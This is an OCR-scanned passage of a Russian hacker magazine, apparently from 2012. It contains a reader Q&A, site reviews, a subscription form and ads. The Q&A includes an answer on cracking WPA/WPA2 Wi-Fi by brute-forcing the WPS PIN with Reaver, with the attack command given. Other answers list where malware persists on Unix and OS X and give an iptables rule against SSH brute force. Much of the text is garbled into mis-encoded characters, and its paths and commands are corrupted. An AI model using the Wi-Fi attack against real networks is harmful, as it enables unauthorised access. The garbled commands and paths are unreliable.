ПРОПИСАТЬ СЕБЯ ВИРУС В СИСТЕМАХ 
І_ІІ\ІІІХ И 05 X, ЧТОБЫ ОСТАТЬСЯ 
В СИСТЕМЕ ПОСЛЕ ПЕРЕЗАГРУЗКИ? 

В ШМІХ-системах его нужно искать 
в следующих папках: 

/ѵаг/а1:/1:аЬ5/<и5еппате> 

/е1=с/1=1=У5 
/е'Ьс/ргойІе 
/еТс/ЬавІзгс 
/еТс/сБІі . сбііпс 
/е1:с/с5Іі.1о§іп 






5 ШАГОВ: ИСПОЛЬЗУЕМ ОВОРВОХ КАК БЕСПЛАТНЫЙ ХОСТИНГ 



овольная бредовая идея — использо- 
вать РгорЬох для хостинга — работа- 
ет и набирает популярность. А что? 
Никакой мороки с регистрацией, никакого 
геморроя с редактированием файлов 
и отправкой их на сервер (все делается внутри 
папки РгорЬох), у сервиса практически 
гарантированный аптайм 99,9 % (спасибо 
Атагоп 53) — короче говоря, почему бы и нет? 




Проще всего, конечно, со статическим 
сайтом. Ты просто берешь все файлы 
проекта (НТМІ_, С55, ЗаѵаЗсгірІ- 
сценарии) и забрасываешь их в директорию 
РиЫіс, после чего получаешь через контекст- 
ное меню риЫіс-линк для домашней страницы 
(скажем, іпбех.ЫтІ) вроде этого: 




оіті . 



Казалось бы, если следовать логике, 
то при открытии этой ссылки поль- 
зователю будет предложено скачать 
іпбех.ЫтІ. Но нет. РгорЬох устроен так, что 
будет отдавать такой контент, как и любой дру- 
гой хостинг. Страница откроется! Некрасивую 
ссылку можно сократить с помощью сервиса 
типа ЫЫу и ему подобных. 
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РАСНЛМІТЕО 



/е1:с/гс.соттоп 
~/.ргоб!е 
~/ . Ьазіігс 



БОЛЬШОЙ ВОПРОС 



В 05 X он может скрываться здесь: 

/Бузует/ І_іЬгагу/І_аипсІіОаетоп б 

/5ѵ5~Еет/ІіЬгагу/Ех1:еп5Іоп5 

/1_іЬгагу/І_аипсІп0аетоп5 

/Бѵ5І:ет/І.іЬгагу/І.аипсІіА%еп1:5 

/І_іЬгагу/І_аипсІпА§еп1:5 

/І_іЬгагу/Б1:аг1:ирІ1:ет5 

/ІіЬгагу/Рге-Регепсе5/1о§іпыіпсІоы. ріізі: 

~/ИЬгагу/1аипсМА^еп1:5 

~/ІіЬгагѵ/Рге-Регепсе/1о^іпі1:ет5 . рІІБІ: 

~/ІіЬ г агѵ/Рге-Регепсе/ 1 о§іпыіпсІоы5 . рІІБІ: 

Но это, скорее, касается зловреда, который 
работает в изег тобе. Изящно написанная 
малварь может сделать бэкдор прямо в ядре 
системы: 



/5у5І:ет/ІіЬгагу/СасІіе5/сот . арріе . кегпеІсасІіеБ 

/БуБІ:ет/ІіЬгапу/Рі1е5у5І:ет5/Арр1е5Ізапе/ 

/Бу5І:ет/ІіЬгапу/Рі1е5у5І:ет5/ІтР5.-р5/ЕпсосІіп§5/ 



А еще более искусно созданные образцы 
задействуют расширения ЕРІ (актуально для 
современных Мас'ов, построенных на платфор- 
ме Іпіеі). 



ЗАНОВО СИСТЕМУ СТАВИТЬ НЕ ХОЧУ, 
ПОЭТОМУ СОБИРАЮСЬ СДЕЛАТЬ КЛОН. 
СЛЫШАЛ, ЧТО ЕСЛИ СТАВИТЬ ѴѴІЫ О 0ѴѴ5 7 
НА 550, ТО УСТАНОВЩИК САМ ПОПРАВИТ 
КАКИЕ-ТО ПАРАМЕТРЫ. ПОДОЗРЕВАЮ, 
ЧТО В СЛУЧАЕ КЛОНИРОВАНИЯ ЭТОГО 
НЕ ПРОИЗОЙДЕТ. ТАК ЧТО ЖЕ НАДО 
СДЕЛАТЬ, ЧТОБЫ 550 НЕ УМЕР УЖЕ 
ЧЕРЕЗ ГОД? 



СДЕЛАЛ АПГРЕЙД И ПРИОБРЕЛ 
СЕБЕ 550 ДЛЯ СИСТЕМНОГО ДИСКА. 



□ Чтобы минимизировать износ диска, 
производители советуют снизить 
количество операций записи. ѴѴіпсіоѵѵб 7 
довольно умна в этом плане и сама умеет 
отключать механизмы, которые часто 
производят запись (например, ЗирегЫсЬ или 
АррІісаЛоп ІаипсГі ргеЫсЫпд). Как ОС 
отреагирует после клонирования, сложно 



СУЩЕСТВУЮТ ЛИ БОЛЕЕ ЭФ- 
ФЕКТИВНЫЕ СПОСОБЫ ВЗЛОМА 
БЕСПРОВОДНОЙ ѴѴІ-РІ-СЕТИ, 
ЗАЩИЩЕННОЙ ѴѴ РА/ ѴѴ РА 2 ? МЫ ЖЕ ВСЕ 
ПОНИМАЕМ, ЧТО ПРИ ДОСТАТОЧНОЙ 
СЛОЖНОСТИ И ДЛИНЕ ПАРОЛЬНОЙ 
ФРАЗЫ ПЕРЕБОР МОЖЕТ ДЛИТЬСЯ 
ВЕЧНО. 




До недавнего времени я бы ска- 
зал, что никаких других способов 
подключиться кзащищенной 
беспроводной сети, кроме как использо- 
вать брутфорс, не существует. Собственно, 
способы взлома непосредственно ѴѴРА/ 
ѴѴРА2 остались неизменными, однако 
получить доступ кзащищенной беспро- 
водной сети можно, воспользовавшись 
обходным путем, но только в том случае, 
если в ней применяется очень популяр- 
ная сегодня технология ѴѴР5. Напомню, 
что ѴѴі-Рі РгоІеЩеб 5еШр — это стандарт, 
который позволяет легко установить дома 
защищенную беспроводную сеть на базе 
ѴѴРА2. Идея в том, что пользователю 
не нужно заморачиваться с настройкой 
защиты и вводом длинных парольных 
фраз, когда он добавляет в беспроводную 
сеть новое устройство, — весь процесс 
максимально упрощается. Используются 
восьмизначные РІКІ-коды. До недавне- 
го времени эта технология считалась 
безопасной, но в декабре сразу несколько 
исследователей безопасности рассказали 
о неустранимых промахах в ее структуре 




(то есть фактически в устройстве], которые 
можно эксплуатировать. Протокол ѴѴР5 
оказался уязвимым к брутфорс-атакам, 
которые позволяет злоумышленнику по- 
добрать ѴѴР5 РІІ\І, используемый точкой 
доступа, и, соответственно, парольную 
фразу ѴѴРА/ѴѴРА2, причем, что очень важ- 
но, всего за нескольких часов! Уязвимость 
«живет» на самом низком уровне, в самом 
протоколе. Это промах его разработчиков. 
В паблике доступна утилита Реаѵег ( ЬІГ 
Іѵ/иАа567 ), которая уже работает вполне 
стабильно и протестирована для большин- 
ства точек доступа и реализаций прото- 
кола ѴѴР5. Использовать ее очень просто: 
нужно лишьуказать целевую ВВ5Ю (ее 
МАС-адрес) и интерфейс (который пред- 
варительно нужно перевести в режим 
монитора), который будет слушать эфир: 

геаѵег топѲ -Ь 00:01:02:03:04:05 

Помимо этого, автор предлагает коммер- 
ческую версию с несколькими полезны- 
ми фичами и улучшениями, касающимися 
скорости подбора. Атаковать можно 
практически любой современный роутер, 
в котором ѴѴР5 включена по умолча- 
нию, — это миллионы девайсов по всему 
миру! Более подробнее об атаке ты 
можешь прочитать в этом документе: ЫГ 
Іѵ/иАа567 . Помимо геаѵег, есть еще один 
РоС ( ЫЫу/иЗппТХГ ). реализующий атаку, 
но эта утилита пока работает не со всеми 
ѴѴі-Рі-адаптерами. 



Еп^ГурІІОп Тур*: 

т ѳа 

Чеіуогк аду: 
ейт 71 «5 бі к Е.г 

ША 6Е 67 77 те 61 

веге 66 ь* 6? бб 4? б* 

Шй Еб ЁЭ 6 ? Й 7 5 Р 74 

аду Ищр ДІдогі^Ка; 



56 72 66 41 64 64 79 5Р 
5Р 70 61 73 79 76 6В 72 
56 64 75 63 6В 56 43 71 
66 64 71 56 6Е ЕЕ 65 



БС 6Р сеі11у_геаІ1у_1в 
61 73 
61 63 



Для подключения к сети ѴѴР5 используется восьмизначный РШ. Сначала брутфорсится его первая часть, потом 
вторая, и в конце концов извлекается парольная фраза ѴѴРА2! 



I Увы, динамические сценарии на таком 
хостинге выполнить не получится, 

I а вот прикрутить СМ5 можно благо- 
даря сервису сІгоррадеБ.сот . Скачиваем 
с последнего тему для сайта (например, бето. 
бгоррадез.сот.гір), после чего распаковываем 
архив в папку вроде уоиг_зіІе.бгоррадеБ.сот. 
Очень скоро здесь будет сайт. 



Структура состоит из трех папок: 
Сопіепі (контент сайта в текстовом 
виде), РиЫіс (статический контент] 
и Тетріаіез (НТМЬ-файлы, используемые для 
оформления страницы). Ты можешь настроить 
шаблоны под себя и разметить текст (в папке 
Сопіепі) с помощью специальной разметки и 
ключевых слов. 



Далее используем стандартную воз- 
можность для расшаривания папок 
и предоставляем доступ зегѵегій 
сІгоррадеБ.сот. После этого сервис сможет 
обрабатывать твои файлы с контентом и ша- 
блонами и отдавать сформированные НТМІ_- 
страницы. За небольшую денежку можно 
даже привязать сайт к домену. 
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ІЖІТБ/РАСНІМТЕО 



сказать, поэтому рекомендую проверить 
значения параметров ЕпаЫеЗирегІ'екЬ 
и ЕпаЫеРгеЫсЬег в ветке 

НКЕѴ_10САІ__МАСНІМЕ\5Ѵ5ТЕМ\ 
СиггепіСоп1гоІ5е1\Соп1гоІ\5е55Іоп Мападег\ 
Метогу МападетепЦРгеІюІсЬРагатеІегз. Не- 
которые также рекомендуют отключить очист- 
ку зѵѵар-файла. Делается это в разделе НКЕѴ_ 
ЮСА1_М АСН I МЕ\5У5ТЕМ\Сиггеп1;Соп1:гоІ5еі\ 
СопІгоІ\Метогу МападетепЦ: нужно задать 
ключу СІеа гРадеРіІеАіЗЬ иісіоѵѵп значение 0. 
Помимо этого, нужно убедиться, что работает 
команда ТРІМ, позволяющая операционной си- 
стеме уведомлять твердотельный накопитель 
о том, какие блоки данных больше не исполь- 
зуются и могут быть очищены накопителем са- 
мостоятельно. Выяснить это можно с помощью 
команды: 

івиіііі Ьебаѵіог циегу РізаЫеРеІеіеІМоІі і-Рѵ 

Если в выводе значение ОізаЫеОеІеІеІМоШу, 
значит, ТРІМ включен. Но только на уровне 
ОС. Поэтому надо убедиться, что ТРІМ под- 
держивается драйвером (чаще всего РАЮ- 
контроллера или стандартного М5АНСІ). 

МОЖНО ЛИ С ПОМОЩЬЮ РУТНОЫ- 
СКРИПТОВ АВТОМАТИЗИРОВАТЬ 
ПОСЛЕДОВАТЕЛЬНОСТЬ ДЕЙСТВИЙ 
В ѴѴІІЧЮ0ѴѴ5-СИСТЕМЕ? 

□ Готовых решений для РуіЬоп'а не так уж 
и много. Среди полезных библиотек 
можно выделить руѵѵіпаиіо ( сосіе.доодіе.сот/р/ 
рѵѵѵіпаиіо ). которая специально предназначе- 
на для ОІЛ-автоматизации. Сценарии 
получаются очень наглядными и не требуют 
комментариев: 

Тгот рѵміпаиііо ітрогіі арріісаіііоп 
арр = аррІісаІііоп.АррІісаІііоп. 

5іаг1і( "поіерасі . ехе" ) 
арр. ІМоіерасІ .Мепи5е1ес1і( 

"Не1р->АЬои1і ІМоіерасІ") 
арр.АЬои1іІ\Іо1іерасІ.(Ж.С1іскО 
арр. ІМоІіерасІ. ЕсІіІі.ТѵреКеѵБ ( 

"рѵыіпаиііо Іліогкз!". мі1іІі_5расе5=Тгие^ 

Подробный мануал есть на офсайте 

( рѵѵуіпаиіо.доодіесобе.сот/бд/рѵѵѵіпаиіо/сіосз/ 

іпсіех.іііті ). Установить библиотеку тоже не со- 
ставит труда: 

1. Распаковатьархив. 

2. Запустить руіЬоп. ехе зеіир.ру іпзіаіі. 

3. Установить РІЕ( ѵѵѵѵѵѵ.рѵі1"іопѵѵаге.сот/ 
ргобисіз/ріІ/іпбех.Ыт ). 

4. Установить еіетепигее ( еІТЬоі.огд/ 
боѵѵпІоасЫ . 



□ ВО ВРЕМЯ ПРЕЗЕНТАЦИЙ ЧАСТО 
ВИДЕЛ, КАК ДОКЛАДЧИК 
НАЖИМАЕТ КАКОЙ-ТО ХОТКЕЙ 
И УВЕЛИЧИВАЕТ ОПРЕДЕЛЕННУЮ ЧАСТЬ 
ЭКРАНА, ЧТОБЫ ПРОДЕМОНСТРИРОВАТЬ 
ЧТО-ТО В ДЕТАЛЯХ. КАК ЭТО ДЕЛАЕТСЯ? 

□ Проще всего использовать утилиту 

2оотІ{ ( ЫЕІѵ/иІЛгОсІ ) от Марка Руссино- 
вича. Она тихо сидит в трее и как раз по хоткею 
увеличивает выбранную часть экрана. Помимо 
этого, на увеличенном изображении можно 
сразу что-то нарисовать. 

□ КАК МОЖНО НАСТРОИТЬ ФАЙЕРВОЛ 
В ЬШИХ, ЧТОБЫ ПРЕДОТВРАТИТЬ 
БРУТФОРС-АТАКИ НА55Н? 

□ Никогда бы не подумал, что столько 
людей пытаются сбрутфорсить пароль 
для 55Н-демона никому не нужного сервера, 
пока не посмотрел в его логи. Несколько тысяч 
неудачных попыток входа каждый день — 
вполне традиционная картина. Большинство 
таких попыток можно отсечь, просто перенеся 
демон на какой-нибудь нестандартный порт 
(со стандартного 22). Другой вариант — пра- 
вильно настроить ірІаЫез. Опытные ли нуксои- 
ды рекомендуют следующий рецепт: 

ірІіаЫез -Р ІІЧРІЛ РКОР 

ірІіаЫез -А ІІМРІІТ _чті зііаііе \ 

- -5Ііа1=е Е5ТАВІ.І5НЕР.КЕІ.АТЕР -д АССЕРТ 
іріаЬІез -А ІІМРІІТ -р 1=ср -ш 1=ср \ 

--сірогіі 22 -т зііаііе --зііаііе ІМЕІлІ \ 

-т гесепі: --зеі: --пате 55Н 

ІрІіаЫез -А ІІМРІІТ -р Ііср -т 1іср^\ 

--брогі 22 -т зііаііе --зііаііе ІМЕІлМ^ 

-т гесепі --ирсіаіе --зесопсіз 60 \ 

- -Ыіісоипіі 4 --гііііі --пате 55Н -і РКОР 
іріаЬІез -А ІІМРІІТ -р іср -ш іср \ 

--сірогі 22 -т зііаііе --зііаііе ІМЕІлІ -д АССЕРТ 

После этого хосты, пытающиеся перебирать 
пароль, будут блокироваться: все ІР из черного 
списка будут фиксироваться в файле /ргос/пеі/ 
ірІ_гесепі/55Н. 

С НЕДАВНЕГО ВРЕМЕНИ (К СЛОВУ, 
ПОСЛЕ ПРОЧТЕНИЯ СТАТЬИ 
«6ІТ&&6ІТНІІВ: С МЕСТА В КАРЬЕР») 

НАЧАЛ ИСПОЛЬЗОВАТЬ СИСТЕМУ 
УПРАВЛЕНИЯ ВЕРСИЯМИ 6ІТ. НО МЕНЯ 
УБИВАЕТ, ЧТО ДЛЯ РЕДАКТИРОВАНИЯ 
СООБЩЕНИЙ ДЛЯ СОММІТ'ОВ ДАЖЕ ПОД 
ѴѴІ N Ю0ѴѴ5 НЕОБХОДИМО ИСПОЛЬЗОВАТЬ 
НИКСОВЫЙ ѴІМ. КАК БЫ ВМЕСТО НЕГО 
ИСПОЛЬЗОВАТЬ ЧТО-НИБУДЬ БОЛЕЕ 
ПРИВЫЧНОЕ? 





№ Мгміііпп ілі ііш I 

01 і іт 1 і: ілёлгі Кеп^цоі: іді: ; НопогрЙ 

йепвцос ілс іоп - Йог ЗирроіЧеЛ 



Уязвимый к ООоБ 55І_-демон 




Для подключения к ѴѴРА2-сети с помощью ѴѴР5 достаточно 
ввести восьмизначный РІЫ. И его можно сбрутфорсить! 



□ Советую тебе скачать ОііРасІ ( Ыірз:// 

аііЬиЬ.сот/аііЬиЬ/аіІрасІ ). Это небольшое 
приложение, которое конфигурирует систему 
так, чтобы в качестве стандартного редактора 
использовался самый обычный «Блокнот». 
Можно подключить, скажем, ІМоІерасі++. Для 
этого внесем изменения в конфиг СіГа: 

§іі сопб§ --§1оЬа1 соге.есШіог \ 

" ’СЛХРпо^пат Рііез (х8бН\ІМо1іерасІ++\\ 
по1IерасI++.еxе , -тиііііпзіі -поіаЬЬап 
-позеззіоп -поРІи^іп" 

□ НУЖНО СГРАББИТЬ ДАННЫЕ 

С НЕКОТОРОГО САЙТА, КОТОРЫЕ ОН 
ВЫДАЕТ В РЕЗУЛЬТАТЕ ПОИСКА ПОСЛЕ 
ВВОДА НЕКОТОРЫХ ПАРАМЕТРОВ. МОЖНО 
ЛИ ОБОЙТИСЬ БЕЗ ПРОГРАММИРОВАНИЯ? 



□ Самый крутой способ, который меня 

не раз выручал — это воспользоваться 
сервисом ореп.сіаррег.пеі от ѴаЬоо. Подход 
удивляет своей простотой: 

1. Ты указываешь сервису ІІРЬ-сайта, с которо- 
го хочешь извлечь информацию. Оаррег.пеі 
открываетего внутри своего собственного 
движка и приступаетканализу. 

2 . Далееты осуществляешьнужные переходы 
по сайту и, главное, отмечаешьте поля, кото- 
рые необходимозаполнить. Каждому из них 
можно задать имя, скажем, «ѵагіаЫе 1» — 
когда будешь запускать скрипт, ты сможешь 
указатьегозначения. 

3. В конце концов, когда появляются элементы 
сайта с нужными данными, ты обознача- 
ешьструктуру. Если, скажем, это выборка 
фильмов, то кликаешь на название фильма 
и в поле вписываешь «Название фильма», 
далее кликаешь на рейтинги добавляешь 
новый элемент «Рейтинг» в структуру и т.д. 

4 . Последний штрих — это экспортданных. 
Можно оформить извлеченные данные 
в виде Р55 и подписаться на нихвнутри 
своего Р55-ридера (таким образом, это 
идеальный способ превратить любой сайт 
в Р55-ленту), а можно, скажем, просто 
экспортировать все в ХМ Ь и использовать 
сграбленные данные в своих проектах. 



Увы, некоторые сайты банят робота баррег. 
пеі и автоматизировать их так просто уже 
не удается. ПЕ 
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Подписка 



ГОДОВАЯ 
ЭКОНОМИЯ 

500 руб 



1. Разборчиво заполни подписной купон и кви- 
танцию, вырезав их из журнала, сделав ксе- 
рокопию или распечатав с сайта зЬор.дІс.ги . 

2. Оплати подписку через любой банк. 

3. Вышли в редакцию копию подписных доку- 
ментов — купона и квитанции — любым из 
нижеперечисленных способов: 

• на е-таіі: зиЬзсгіЬеОдІс.ги; 

• по факсу: (495) 545-09-06; 

• почтой по адресу: 1 15280, Москва, 

ул. Ленинская Слобода, 19, Омега плаза, 

5 эт., офис № 21, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ 
ОПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ 
МОЖНО ОФОРМИТЬ С НОЯБРЯ. 



12 НОМЕРОВ — 2200 РУБ. 

6 НОМЕРОВ — 1260 РУБ. 

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ 
ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ! 




ПРИ ПОДПИСКЕ 
НА КОМПЛЕКТ ЖУРНАЛОВ 

ЖЕЛЕЗО + ХАКЕР + 2 ОѴО: — 

ОДИН НОМЕР ВСЕГО ЗА 162 РУБЛЯ 
(НА 35% ДЕШЕВЛЕ, ЧЕМ В РОЗНИЦУ) 



ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА) 
ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ) 



ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА 
ЗА СЧЕТ ИЗДАТЕЛЯ, В ТОМ ЧИСЛЕ КУРЬЕРОМ 
ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 



ЕСТЬ ВОПРОСЫ? Пиши на піоісідіс.ги или звони по бесплатным телефо- 
нам 8(495)663-82-77 (для москвичей) и 8 (800) 200-3-999 (для жителей 
других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ «ХАКЕР» 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 201 г. 



I — I Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

I I на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 



Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ^ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2012 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 





ГИД ПО НАКРУТКЕ ОНЛАЙН-ГОЛОСОВАНИЙ 




§ 


1 




зюз яі/ѴсіазФ цдиго 







СО 
































со 






О- 








ѴѴѴѴѴѴ2 




2-МІІ5ІС 



2 -тизіс.огд 

Пятнадцатыреков в день — ровно столько позволяет прослушать без приобрете- 
ния премиального аккаунта когда-то бесплатный ргозіоріеег.сот . 2-тизіс — это его 
полный аналог, который пока находится в стадии становления и никаких денежек 
не берет. Поэтому ты можешь без каких-либо ограничений искать музыку, слушать ее 
онлайн и загружать себе на диск. Источником музыки, как и в случае с ргозіоріеег. 
сот, являются социальные сети, куда пользователи пока без всякого зазрения совести 
терабайтами заливают треки. 2-тизіс агрегирует песни, которые находятся в ротации 
популярных радиостанций, и позволяет удобно прослушивать треки из эфира, скажем, 
радио Махітит. 



Музыка бесплатно 



ВІТІ_ЕТ 



Ьіііеі.огд 

Полноценный торрент-клиент, работающий в браузере. Он используется точно так 
же, как и любая десктопная программа. Выбери Іоггепі-файл на диске или укажи ІІРІ_ 
файла, задай место для сохранения данных и наблюдай за неторопливой загрузкой. 
Код ВШ_еІ полностью написан на Эаѵа, поэтому для его работы в браузере должен быть 
установлен плагин Эаѵа ѴМ. Скорость загрузки, однако, очень непредсказуема и ино- 
гда оставляет желать лучшего. В этом случае можно попробовать другой достойный 
онлайн-клиент для сети ВіІТоггепІ — ІоггіЯс аірба ( ѵѵѵѵѵѵ.ІоггіОс.сот ). Правда, бесплат- 
ный аккаунт позволяет загрузить всего несколько гигабайт данных. 

ВіІТоггепІ-клиентонлайн 




5Н0ѴѴМѴССЮЕ 



ѵѵѵѵѵѵ.зЬоѵѵтусосІе.сот 

Как декомпилировать СІ_А55-файлы, чтобы достать исходный код из Эаѵа-бинарника? 
Как получить оригинальные РНР-файлы, которые были пропущены через криптор 
2епсІ СиагсІ? Как вытащить АсІіоп5сгірІ-код из флешового зѵѵі'-файла? С помощью чего 
декомпилировать .ЫЕТ-приложение и извлечь его сорцы на С#, ѴізиаІ Вазіс .ЫЕТ, Э#, 
ѴізиаІ С++ .ЫЕТ? На все эти вопросы можно дать один ответ — попробовать онлайн- 
сервис БЬоѵѵМуСосІе. По сути, это обертка для Эаѵа Оесотрііег, 5ѴѴР Оесотрііег, йіз# 
и других узкоспециализированных зіапсі-аіопе-приложений, которые можно было бы 
использовать в этих случаях. В качестве бонуса БЬоѵѵМуСосІе предлагает анализатор 
(ЗР-кодов. 

Универсальный декомпилятор 
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ІЫТЕРѴІЕѴѴ БТРЕЕТ 



ѵѵѵѵѵѵ.іпіегѵіеѵѵзігееі.сот 

Сборник любопытных задачек для программистов с автоматической системой про- 
верки решения. Предложив решение на одном из 11 языков (С++, РуіЬоп, РНР, Эаѵа и т. 
д.), можно легко попасть на работу в Силиконовую долину. Дело в том, что Іпіегѵіеѵѵ 
Бігееі сотрудничает с крупнейшими ІТ-компаниями (например, с РасеЬоок и Атагоп), 
подгоняя им наиболее талантливых программистов. Это такой бизнес. Іпіегѵіеѵѵ Бігееі 
включает всех программистов, решающих задачки, в большую базу и получает $10000 
за каждого принятого на работу. Благодаря такому подходу начинающая индийская 
компания уже неплохо зарабатывает. 



Онлайн-олимпиада для программистов 
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ІЖІТ5/6ЕЕК АРТ 




Фото: Ексей Пантелеев (ехеурапіеіееѵ.сот), модель: Светлана Новикова. 



■амин 

автомобилей 



Журнал для тех, 
кто заметен в потоке 










ВЫ ВЕРИТЕ В ЛЮБОВЬ С ПЕРВОГО ВЗГЛЯДА? 

А51І5 2ЕМВООК™ с подлинной ОС ѴѴіпсІоѵѵ$® 7 Домашняя расширенная 



Вы никогда такого не видели. Вы никогда такого не чувствовали. Он безумно красивый. Ультратонкий - 
минимальная толщина составляет всего 3 мм. Ультралегкий - матовый алюминиевый корпус весит 
всего 1,1 кг. Ультрабыстрый - мощный процессор ІпТеІ® Соге™ І5 второго поколения, накопитель 5АТА 3.0 
550 и порт 115В 3.0. Возобновляет работу после выхода из спящего режима всего за 2 секунды и работает 
в режиме ожидания до двух недель, в то время как технология 5опісМа$Тег Аибіо обеспечивает 
потрясающее воспроизведение звука. Познакомьтесь с самой невероятной мобильной платформой 
ІЖгаЬоок™ и новым А51І5 2ЕМВ00К™. Это любовь с первого взгляда. 



Просто 
как никогда 



Всемирная гарантия 2 года ѵѵѵѵѵѵ.а$и$.ги 

Горячая линия А51І5: (495) 23-11 -999, 8-800-100-2787 ѵѵшѵѵ.а$и$пЬ.ги 



Дух инноваций • Путь к совершенству 



Эксклюзивная сервисная программа А51І5 Ріск ир & ВеТигп 
для ноутбуков 11X21/11X31. Специальные условия обслужи- 
вания для ноутбуков А51І5 особых серий. Подробности на 
бНр://ѵѵѵѵѵѵ.а5и5пЬ.ги/Р11В 
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Реклама. 



